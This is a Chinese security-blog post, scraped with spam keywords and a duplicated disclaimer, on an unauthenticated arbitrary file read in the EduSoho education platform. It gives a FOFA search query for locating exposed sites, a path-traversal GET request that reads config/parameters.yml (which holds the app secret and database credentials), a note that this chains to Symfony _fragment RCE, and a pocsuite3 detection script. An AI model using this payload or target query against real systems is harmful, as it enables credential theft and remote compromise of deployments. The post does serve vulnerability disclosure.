网站建设技术哪个好,男和男人怎么做那个视频网站,pc端软件开发,dedecms做网站和thinkphp免责声明
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
漏洞描述
教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞通过该漏洞攻击者可以读取到config/parameters.yml文件的内容拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后攻击者可以结合symfony框架_fragment路由实现RCE。 fofa语句
titlePowered By EduSoho || bodyPowered by a href\http://www.edusoho.com/\ target\_blank\EduSoho || (bodyPowered By EduSoho bodyvar app)
poc加检测
GET /export/classroom-course-statistics?fileNames[]../../../config/parameters.yml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1 poc脚本
脚本使用的pocsuite框架
# _*_ coding:utf-8 _*_
# Time : 2024/1/27
# Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_strclass edusoho_files_fileread(POCBase):pocDesc EduSoho任意文件读取漏洞author 炼金术师诸葛亮createDate 2024-1-27name EduSoho任意文件读取漏洞# titlePowered By EduSoho || bodyPowered by a href\http://www.edusoho.com/\ target\_blank\EduSoho || (bodyPowered By EduSoho bodyvar app)def _verify(self):result {}url self.url /export/classroom-course-statistics?fileNames[]../../../config/parameters.ymlheaders{User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36}try:response requests.get(url,headersheaders)if response.status_code 200 and parameters in response.text:result[VerifyInfo] {}return self.parse_output(result)except Exception as e:passregister_poc(edusoho_files_fileread)
脚本利用
